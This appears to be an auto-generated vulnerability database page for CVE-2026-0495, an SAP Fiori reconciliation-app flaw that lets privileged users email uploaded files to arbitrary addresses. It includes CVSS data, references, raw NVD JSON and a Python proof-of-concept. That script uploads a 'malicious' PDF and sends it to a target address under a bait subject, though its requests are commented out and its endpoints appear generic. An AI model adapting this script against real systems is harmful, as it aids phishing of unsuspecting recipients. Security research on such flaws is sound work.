CVE-2026-0495

Description

SAP Fiori App Intercompany Balance Reconciliation allows an attacker with high privileges to send uploaded files to arbitrary emails which could enable effective phishing campaigns. This has low impact on confidentiality, integrity and availability of the application.

CVSS Details

CVSS Score

5.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

SAP Fiori App Intercompany Balance Reconciliation (ICBR) - 特定版本需参考SAP官方安全公告

SAP S/4HANA - 受影响版本请查阅SAP Note 3565506

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-0495 PoC - SAP Fiori Phishing Attack # Requires high-privilege SAP account access import requests import json # Configuration SAP_HOST = "https://sap-system.example.com" USERNAME = "attacker_account" PASSWORD = "password" TARGET_EMAIL = "[email protected]" PHISHING_FILE = "malicious_document.pdf" # Step 1: Authenticate to SAP Fiori session = requests.Session() login_url = f"{SAP_HOST}/sap/public/logon" auth_data = { "UserName": USERNAME, "Password": PASSWORD } # session.post(login_url, data=auth_data) # Step 2: Access Intercompany Balance Reconciliation app app_url = f"{SAP_HOST}/sap/fi/icbr" # response = session.get(app_url) # Step 3: Upload phishing file upload_url = f"{SAP_HOST}/sap/fi/icbr/upload" files = {'file': (PHISHING_FILE, open(PHISHING_FILE, 'rb'), 'application/pdf')} # upload_response = session.post(upload_url, files=files) # Step 4: Send file to target email send_url = f"{SAP_HOST}/sap/fi/icbr/send" send_data = { "file_id": "uploaded_file_reference", "recipient_email": TARGET_EMAIL, "subject": "Intercompany Balance Statement", "message": "Please review attached statement" } # send_response = session.post(send_url, json=send_data) print("PoC demonstrates file upload and email send functionality abuse") print("Actual exploitation requires valid SAP credentials with high privileges")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0495
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0495
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0495/
[4] VulDB https://vuldb.com/cve/CVE-2026-0495
[5] https://me.sap.com/notes/3565506
[6] https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0495", "sourceIdentifier": "[email protected]", "published": "2026-01-13T02:15:51.830", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP Fiori App Intercompany Balance Reconciliation allows an attacker with high privileges to send uploaded files to arbitrary emails which could enable effective phishing campaigns. This has low impact on confidentiality, integrity and availability of the application."}, {"lang": "es", "value": "La aplicación SAP Fiori Intercompany Balance Reconciliation permite a un atacante con altos privilegios enviar archivos cargados a correos electrónicos arbitrarios, lo que podría facilitar campañas de phishing efectivas. Esto tiene un impacto bajo en la confidencialidad, integridad y disponibilidad de la aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-15"}]}], "references": [{"url": "https://me.sap.com/notes/3565506", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}